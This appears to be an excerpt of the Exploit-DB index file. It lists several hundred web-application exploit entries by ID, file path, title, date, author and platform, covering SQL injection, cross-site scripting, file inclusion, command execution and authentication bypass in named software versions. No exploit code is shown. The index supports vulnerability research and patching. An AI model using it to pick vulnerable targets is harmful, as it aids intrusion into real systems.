-32507,exploits/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps, -32508,exploits/php/webapps/32508.txt,"Kemana Directory 1.5.6 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,php,webapps, -32509,exploits/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps, -32510,exploits/php/webapps/32510.txt,"Kemana Directory 1.5.6 - 'qvc_init()' Cookie Poisoning CAPTCHA Bypass",2014-03-25,LiquidWorm,php,webapps, -32511,exploits/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 -32516,exploits/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php?i' SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 -32521,exploits/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusions",2008-10-23,BoZKuRTSeRDaR,php,webapps, -32523,exploits/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection",2008-10-23,xuanmumu,php,webapps, -32524,exploits/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection",2008-10-23,xuanmumu,php,webapps, -32525,exploits/php/webapps/32525.txt,"Jetbox CMS 2.1 - 'liste' Cross-Site Scripting",2008-10-23,"Omer Singer",php,webapps, -32526,exploits/php/webapps/32526.txt,"ClipShare Pro 4.0 - 'fullscreen.php' Cross-Site Scripting",2008-10-23,ShockShadow,php,webapps, -32527,exploits/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 - 'html-tidy-logic.php' Cross-Site Scripting",2008-10-23,ShockShadow,php,webapps, -32528,exploits/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 - 'pg' Cross-Site Scripting",2008-10-24,"Ghost Hacker",php,webapps, -32531,exploits/php/webapps/32531.txt,"phpMyAdmin 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",php,webapps, -32532,exploits/php/webapps/32532.txt,"bcoos 1.0.13 - 'common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,php,webapps, -32533,exploits/php/webapps/32533.txt,"Tandis CMS 2.5 - 'index.php' Multiple SQL Injections",2008-10-27,G4N0K,php,webapps, -32535,exploits/php/webapps/32535.txt,"MyBB 1.4.2 - 'moderation.php' Cross-Site Scripting",2008-10-27,Kellanved,php,webapps, -32536,exploits/php/webapps/32536.txt,"bcoos 1.0.13 - 'click.php' SQL Injection",2008-10-27,DeltahackingTEAM,php,webapps, -32537,exploits/php/webapps/32537.txt,"All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection",2008-10-27,ExSploiters,php,webapps, -32538,exploits/php/webapps/32538.txt,"PHP-Nuke Nuke League Module - 'tid' Cross-Site Scripting",2008-10-28,Ehsan_Hp200,php,webapps, -32539,exploits/php/webapps/32539.html,"Microsoft Internet Explorer 6 - '&NBSP;' Address Bar URI Spoofing",2008-10-27,"Amit Klein",php,webapps, -32540,exploits/php/webapps/32540.pl,"H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass",2008-10-28,StAkeR,php,webapps, -32541,exploits/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,php,webapps, -32542,exploits/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 - 'view.php' SQL Injection",2008-10-28,G4N0K,php,webapps, -32543,exploits/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 - 'search.php' Cross-Site Scripting",2008-10-28,cize0f,php,webapps, -32544,exploits/php/webapps/32544.txt,"KKE Info Media Kmita Gallery - Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,php,webapps, -32545,exploits/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Web Shell",2014-03-26,"Groundworks Technologies",hardware,webapps,80 -32546,exploits/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,php,webapps, -32547,exploits/php/webapps/32547.txt,"Extrakt Framework 0.7 - 'index.php' Cross-Site Scripting",2008-10-29,ShockShadow,php,webapps, -32549,exploits/asp/webapps/32549.txt,"Dorsa CMS - 'Default_.aspx' Cross-Site Scripting",2008-10-29,Pouya_Server,asp,webapps, -32553,exploits/php/webapps/32553.txt,"phpWebSite 0.9.3 - 'links.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps, -32554,exploits/php/webapps/32554.txt,"SpitFire Photo Pro - 'pages.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps, -32556,exploits/multiple/webapps/32556.txt,"Dell SonicWALL EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619 -32557,exploits/ios/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution",2014-03-27,Vulnerability-Lab,ios,webapps,8080 -32558,exploits/ios/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080 -32559,exploits/ios/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080 -32560,exploits/ios/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080 -32561,exploits/php/webapps/32561.txt,"LinEx - Password Reset",2014-03-27,"N B Sri Harsha",php,webapps,80 -32562,exploits/php/webapps/32562.txt,"Joomla! Component Kunena 3.0.4 - Persistent Cross-Site Scripting",2014-03-27,Qoppa,php,webapps,80 -32566,exploits/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 - Cross-Site Scripting",2008-11-04,"Brad Antoniewicz",php,webapps, -32567,exploits/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps, -32569,exploits/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,ios,webapps,8888 -32570,exploits/php/webapps/32570.txt,"CuteNews aj-fork - 'path' Remote File Inclusion",2008-11-06,DeltahackingTEAM,php,webapps, -32571,exploits/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 - SQL Injection / Cross-Site Scripting",2008-11-07,G4N0K,php,webapps, -32574,exploits/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",java,webapps, -32575,exploits/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass (2)",2008-11-08,G4N0K,php,webapps, -32576,exploits/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection",2008-11-10,"Francesco Bianchino",multiple,webapps, -32577,exploits/asp/webapps/32577.txt,"Dizi Portali - 'film.asp' SQL Injection",2008-11-10,"Kaan KAMIS",asp,webapps, -32579,exploits/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps, -32580,exploits/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect",2014-03-29,"felipe andrian",asp,webapps, -32588,exploits/php/webapps/32588.txt,"BoutikOne CMS - 'search_query' Cross-Site Scripting",2008-11-17,d3v1l,php,webapps, -32589,exploits/php/webapps/32589.html,"Kimson CMS - 'id' Cross-Site Scripting",2008-11-18,md.r00t,php,webapps, -32592,exploits/php/webapps/32592.txt,"Easyedit CMS - 'subcategory.php?intSubCategoryID' SQL Injection",2008-11-19,d3v1l,php,webapps, -32593,exploits/php/webapps/32593.txt,"Easyedit CMS - 'page.php?intPageID' SQL Injection",2008-11-19,d3v1l,php,webapps, -32594,exploits/php/webapps/32594.txt,"Easyedit CMS - 'news.php?intPageID' SQL Injection",2008-11-19,d3v1l,php,webapps, -32595,exploits/php/webapps/32595.txt,"Softbiz Classifieds Script - Cross-Site Scripting",2008-11-20,"Vahid Ezraeil",php,webapps, -32597,exploits/php/webapps/32597.txt,"Pilot Group PG Roommate Finder Solution - SQL Injection",2008-11-23,ZoRLu,php,webapps, -32598,exploits/php/webapps/32598.txt,"COms - 'dynamic.php' Cross-Site Scripting",2008-11-24,Pouya_Server,php,webapps, -32600,exploits/php/webapps/32600.txt,"AssoCIateD 1.4.4 - 'menu' Cross-Site Scripting",2008-11-27,"CWH Underground",php,webapps, -32601,exploits/asp/webapps/32601.txt,"Ocean12 FAQ Manager Pro - 'Keyword' Cross-Site Scripting",2008-11-29,"Charalambous Glafkos",asp,webapps, -32602,exploits/asp/webapps/32602.txt,"Ocean12 (Multiple Products) - 'Admin_ID' SQL Injection",2008-11-29,"Charalambous Glafkos",asp,webapps, -32603,exploits/asp/webapps/32603.txt,"Ocean12 Mailing LisManager Gold 2.04 - 'Email' SQL Injection",2008-11-29,"Charalambous Glafkos",asp,webapps, -32604,exploits/asp/webapps/32604.txt,"ParsBlogger - 'blog.asp' Cross-Site Scripting",2008-11-29,Pouya_Server,asp,webapps, -32605,exploits/php/webapps/32605.txt,"Venalsur Booking Centre 2.01 - Multiple Cross-Site Scripting Vulnerabilities",2008-11-29,Pouya_Server,php,webapps, -32606,exploits/php/webapps/32606.txt,"Basic-CMS - 'q' Cross-Site Scripting",2008-11-29,Pouya_Server,php,webapps, -32607,exploits/php/webapps/32607.txt,"RakhiSoftware Shopping Cart - 'product.php' Multiple Cross-Site Scripting Vulnerabilities",2008-11-28,"Charalambous Glafkos",php,webapps, -32608,exploits/php/webapps/32608.txt,"RakhiSoftware Shopping Cart - PHPSESSID Cookie Manipulation Full Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps, -32609,exploits/asp/webapps/32609.txt,"Pre Classified Listings 1.0 - 'detailad.asp' SQL Injection",2008-12-01,Pouya_Server,asp,webapps, -32610,exploits/asp/webapps/32610.txt,"Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps, -32611,exploits/asp/webapps/32611.txt,"CodeToad ASP Shopping Cart Script - Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps, -32612,exploits/php/webapps/32612.txt,"Softbiz Classifieds Script - 'showcategory.php?radio' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps, -32613,exploits/php/webapps/32613.txt,"Softbiz Classifieds Script - '/advertisers/signinform.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps, -32614,exploits/php/webapps/32614.txt,"Softbiz Classifieds Script - 'gallery.php?radio' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps, -32615,exploits/php/webapps/32615.txt,"Softbiz Classifieds Script - 'lostpassword.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps, -32616,exploits/php/webapps/32616.txt,"Softbiz Classifieds Script - '/admin/adminhome.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps, -32617,exploits/php/webapps/32617.txt,"Softbiz Classifieds Script - '/admin/index.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps, -32619,exploits/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789 -32620,exploits/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 -32622,exploits/php/webapps/32622.txt,"WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 -32623,exploits/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XML External Entity Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps, -32624,exploits/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - 'adname' SQL Injection",2008-12-01,Pouya_Server,php,webapps, -32625,exploits/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps, -32626,exploits/asp/webapps/32626.txt,"ASP Forum Script - 'messages.asp?message_id' SQL Injection",2008-12-01,Pouya_Server,asp,webapps, -32627,exploits/php/webapps/32627.txt,"ASP Forum Script - 'new_message.asp?forum_id' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps, -32628,exploits/asp/webapps/32628.txt,"ASP Forum Script - 'messages.asp?forum_id' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps, -32629,exploits/asp/webapps/32629.txt,"ASP Forum Script - 'default.asp' Query String Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps, -32630,exploits/asp/webapps/32630.txt,"Pre ASP Job Board - 'emp_login.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps, -32631,exploits/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 - Cross-Site Scripting",2008-12-01,IBM,multiple,webapps, -32632,exploits/php/webapps/32632.php,"Fantastico - 'index.php' Local File Inclusion",2008-12-02,Super-Crystal,php,webapps, -32633,exploits/php/webapps/32633.txt,"Z1Exchange 1.0 - 'id' SQL Injection",2008-12-02,Pouya_Server,php,webapps, -32634,exploits/php/webapps/32634.txt,"Z1Exchange 1.0 - 'id' Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps, -32635,exploits/asp/webapps/32635.txt,"Jbook - SQL Injection",2008-12-02,Pouya_Server,asp,webapps, -32636,exploits/php/webapps/32636.txt,"Orkut Clone - 'profile_social.php?id' SQL Injection",2008-12-02,d3b4g,php,webapps, -32637,exploits/php/webapps/32637.txt,"Orkut Clone - 'profile_social.php?id' Cross-Site Scripting",2008-12-02,d3b4g,php,webapps, -32638,exploits/php/webapps/32638.txt,"Horde Webmail 5.1 - Open Redirect",2014-04-01,"felipe andrian",php,webapps, -32639,exploits/php/webapps/32639.txt,"Yappa-ng - 'index.php?album' Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps, -32640,exploits/php/webapps/32640.txt,"Yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps, -32641,exploits/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps, -32642,exploits/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps, -32644,exploits/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 -32645,exploits/php/webapps/32645.txt,"TWiki 4.x - 'SEARCH' Remote Command Execution",2008-12-06,"Troy Bollinge",php,webapps, -32646,exploits/php/webapps/32646.txt,"TWiki 4.x - 'URLPARAM' Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",php,webapps, -32647,exploits/php/webapps/32647.txt,"PrestaShop 1.1 - '/admin/login.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps, -32648,exploits/php/webapps/32648.txt,"PrestaShop 1.1 - 'order.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps, -32649,exploits/php/webapps/32649.txt,"PHPepperShop 1.4 - 'index.php' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps, -32650,exploits/php/webapps/32650.txt,"PHPepperShop 1.4 - 'shop/kontakt.php' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps, -32651,exploits/php/webapps/32651.txt,"PHPepperShop 1.4 - 'shop/Admin/shop_kunden_mgmt.php' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps, -32652,exploits/php/webapps/32652.txt,"PHPepperShop 1.4 - 'shop/Admin/SHOP_KONFIGURATION.php' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps, -32653,exploits/asp/webapps/32653.txt,"Professional Download Assistant 0.1 - SQL Injection",2008-12-09,ZoRLu,asp,webapps, -32655,exploits/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products - 'logon_processing.jsp' SQL Injection",2008-12-11,"3d D3v!L",jsp,webapps, -32656,exploits/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injections",2008-12-01,"security curmudgeon",php,webapps, -32658,exploits/asp/webapps/32658.txt,"ASP-DEV XM Events Diary - 'cat' SQL Injection",2008-12-13,Pouya_Server,asp,webapps, -32660,exploits/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps, -32662,exploits/php/webapps/32662.py,"WebPhotoPro - Multiple SQL Injections",2008-12-14,baltazar,php,webapps, -32663,exploits/php/webapps/32663.txt,"Injader 2.1.1 - SQL Injection / HTML Injection",2008-12-15,anonymous,php,webapps, -32664,exploits/ios/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,ios,webapps,8080 -32665,exploits/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",php,webapps,7778 -32666,exploits/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",php,webapps,7778 -32667,exploits/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",hardware,webapps,80 -32668,exploits/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities",2014-04-03,"Blessen Thomas",php,webapps, -32669,exploits/php/webapps/32669.txt,"PHPcksec 0.2 - 'PHPcksec.php' Cross-Site Scripting",2008-12-17,ahmadbady,php,webapps, -32670,exploits/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",php,webapps, -32671,exploits/php/webapps/32671.txt,"DO-CMS 3.0 - 'p' Multiple SQL Injections",2008-12-18,"crash over",php,webapps, -32672,exploits/php/webapps/32672.txt,"Easysitenetwork Jokes Complete Website - 'joke.php' SQL Injection",2008-12-18,Ehsan_Hp200,php,webapps, -32676,exploits/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 - HTML Injection",2008-12-19,"Moritz Naumann",php,webapps, -32677,exploits/jsp/webapps/32677.txt,"Openfire 3.6.2 - 'group-summary.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps, -32678,exploits/jsp/webapps/32678.txt,"Openfire 3.6.2 - 'user-properties.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps, -32679,exploits/jsp/webapps/32679.txt,"Openfire 3.6.2 - 'log.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps, -32680,exploits/jsp/webapps/32680.txt,"Openfire 3.6.2 - 'log.jsp' Directory Traversal",2009-01-08,"Federico Muttis",jsp,webapps, -32683,exploits/asp/webapps/32683.txt,"Mavi Emlak - 'newDetail.asp' SQL Injection",2008-12-29,"Sina Yazdanmehr",asp,webapps, -32685,exploits/php/webapps/32685.txt,"ViArt Shop 3.5 - 'manuals_search.php?manuals_search' Cross-Site Scripting",2008-12-29,"Xia Shing Zee",php,webapps, -32687,exploits/asp/webapps/32687.txt,"Madrese-Portal - 'haber.asp' SQL Injection",2008-12-29,"Sina Yazdanmehr",asp,webapps, -32689,exploits/php/webapps/32689.txt,"NPDS < 08.06 - Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps, -32698,exploits/php/webapps/32698.txt,"SolucionXpressPro - 'main.php' SQL Injection",2009-01-05,Ehsan_Hp200,php,webapps, -32701,exploits/php/webapps/32701.txt,"WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery",2014-04-04,"High-Tech Bridge SA",php,webapps,80 -32703,exploits/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent",2014-04-05,Vulnerability-Lab,ios,webapps, -32708,exploits/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - '/pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",jsp,webapps, -32709,exploits/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 - 'pagesUTF8/Sys_DirAnzeige.jsp?Pfad' Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps, -32710,exploits/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 - 'pagesUTF8/auftrag_job.jsp?Pfad' Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps, -32713,exploits/php/webapps/32713.txt,"tadbook2 Module for XOOPS - 'open_book.php' SQL Injection",2009-01-07,stylextra,php,webapps, -32714,exploits/php/webapps/32714.txt,"Visuplay CMS - Multiple SQL Injections",2009-01-12,"Joseph Giron",php,webapps, -32716,exploits/asp/webapps/32716.html,"Comersus Cart 6 - User Email and User Password Unauthorized Access",2009-01-12,ajann,asp,webapps, -32718,exploits/php/webapps/32718.txt,"Ovidentia 6.7.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps, -32721,exploits/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps, -32724,exploits/php/webapps/32724.txt,"Dark Age CMS 2.0 - 'login.php' SQL Injection",2009-01-14,darkjoker,php,webapps, -32727,exploits/php/webapps/32727.txt,"MKPortal 1.2.1 - '/modules/blog/index.php' Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps, -32728,exploits/php/webapps/32728.txt,"MKPortal 1.2.1 - '/modules/rss/handler_image.php?i' Cross-Site Scripting",2009-01-15,waraxe,php,webapps, -32729,exploits/asp/webapps/32729.txt,"LinksPro - 'OrderDirection' SQL Injection",2009-01-15,Pouya_Server,asp,webapps, -32730,exploits/asp/webapps/32730.txt,"Active Bids - 'search' Cross-Site Scripting",2009-01-15,Pouya_Server,asp,webapps, -32731,exploits/asp/webapps/32731.txt,"Active Bids - 'search' SQL Injection",2009-01-15,Pouya_Server,asp,webapps, -32732,exploits/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' SQL Injection",2009-01-15,Pouya_Server,php,webapps, -32733,exploits/php/webapps/32733.txt,"w3bcms - '/admin/index.php' SQL Injection",2009-01-15,Pouya_Server,php,webapps, -32734,exploits/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting",2009-01-16,"clément Oudot",cgi,webapps, -32735,exploits/asp/webapps/32735.txt,"Blog Manager - 'ItemID' SQL Injection",2009-01-16,Pouya_Server,asp,webapps, -32736,exploits/asp/webapps/32736.txt,"Blog Manager - 'categoryId' Cross-Site Scripting",2009-01-16,Pouya_Server,asp,webapps, -32741,exploits/jsp/webapps/32741.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'search.jsp?q' Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps, -32742,exploits/jsp/webapps/32742.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'swr.jsp?q' Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps, -32746,exploits/cgi/webapps/32746.txt,"MoinMoin 1.8 - 'AttachFile.py' Cross-Site Scripting",2009-01-20,SecureState,cgi,webapps, -32747,exploits/php/webapps/32747.txt,"PHP-Nuke Downloads Module - 'url' SQL Injection",2009-01-23,"Sina Yazdanmehr",php,webapps, -32748,exploits/asp/webapps/32748.txt,"BBSXP 5.13 - 'error.asp' Cross-Site Scripting",2009-01-23,arashps0,asp,webapps, -32750,exploits/asp/webapps/32750.txt,"OBLOG - 'err.asp' Cross-Site Scripting",2009-01-23,arash.setayeshi,asp,webapps, -32756,exploits/asp/webapps/32756.txt,"LDF - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps, -32757,exploits/php/webapps/32757.txt,"ConPresso CMS 4.07 - Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps, -32758,exploits/asp/webapps/32758.txt,"Lootan - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps, -32759,exploits/php/webapps/32759.txt,"OpenX 2.6.2 - 'MAX_type' Local File Inclusion",2009-01-26,"Sarid Harper",php,webapps, -32760,exploits/php/webapps/32760.txt,"NewsCMSLite - Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,php,webapps, -32765,exploits/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps, -32766,exploits/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' Open Redirection",2009-01-28,buzzy,php,webapps, -32767,exploits/php/webapps/32767.txt,"Quick.CMS 5.4 - Multiple Vulnerabilities",2014-04-09,"Shpend Kurtishaj",php,webapps, -32768,exploits/cgi/webapps/32768.pl,"PerlSoft Gästebuch 1.7b - 'admincenter.cgi' Remote Command Execution",2009-01-29,Perforin,cgi,webapps, -32770,exploits/php/webapps/32770.txt,"E-PHP B2B Trading Marketplace Script - Multiple Cross-Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps, -32773,exploits/php/webapps/32773.txt,"Simple Machines Forum (SMF) 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps, -32777,exploits/php/webapps/32777.html,"MetaBBS 0.11 - Administration Settings Authentication Bypass",2009-02-04,make0day,php,webapps, -32779,exploits/php/webapps/32779.txt,"Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection",2009-02-06,Gizmore,php,webapps, -32782,exploits/php/webapps/32782.txt,"FotoWeb 6.0 - 'Login.fwx?s' Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps, -32783,exploits/php/webapps/32783.txt,"FotoWeb 6.0 - 'Grid.fwx?search' Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps, -32784,exploits/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment 'Username' HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps, -32785,exploits/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps, -33129,exploits/hardware/webapps/33129.html,"Beetel 450TC2 Router - Cross-Site Request Forgery (Admin Password)",2014-04-30,"shyamkumar somana",hardware,webapps,80 -33198,exploits/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps, -32790,exploits/php/webapps/32790.txt,"XCloner Standalone 3.5 - Cross-Site Request Forgery",2014-04-10,"High-Tech Bridge SA",php,webapps,80 -32792,exploits/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80 -32797,exploits/asp/webapps/32797.txt,"Banking@Home 2.1 - 'login.asp' Multiple SQL Injections",2009-02-10,"Francesco Bianchino",asp,webapps, -32802,exploits/php/webapps/32802.txt,"Clipbucket 1.7 - 'dwnld.php' Directory Traversal",2009-02-16,JIKO,php,webapps, -32803,exploits/php/webapps/32803.txt,"A4Desk Event Calendar - 'eventid' SQL Injection",2008-10-01,r45c4l,php,webapps, -32804,exploits/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Remote File Inclusion",2009-02-20,Kacper,php,webapps, -32806,exploits/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps, -32807,exploits/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps, -32808,exploits/php/webapps/32808.txt,"Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps, -32809,exploits/php/webapps/32809.txt,"Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps, -32810,exploits/php/webapps/32810.txt,"Magento 1.2 - 'downloader/index.php' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps, -32814,exploits/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection",2014-04-11,delme,php,webapps, -32816,exploits/php/webapps/32816.txt,"Orooj CMS - 'news.php' SQL Injection",2009-02-25,Cru3l.b0y,php,webapps, -32818,exploits/java/webapps/32818.txt,"JOnAS 4.10.3 - 'select' Error Page Cross-Site Scripting",2009-02-25,"Digital Security Research Group",java,webapps, -32819,exploits/php/webapps/32819.txt,"Parsi PHP CMS 2.0 - 'index.php' SQL Injection",2009-02-26,Cru3l.b0y,php,webapps, -32821,exploits/java/webapps/32821.html,"APC PowerChute Network Shutdown - HTTP Response Splitting / Cross-Site Scripting",2009-02-26,"Digital Security Research Group",java,webapps, -32823,exploits/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps, -32827,exploits/php/webapps/32827.txt,"Afian - 'includer.php' Directory Traversal",2009-03-02,vnbrain.net,php,webapps, 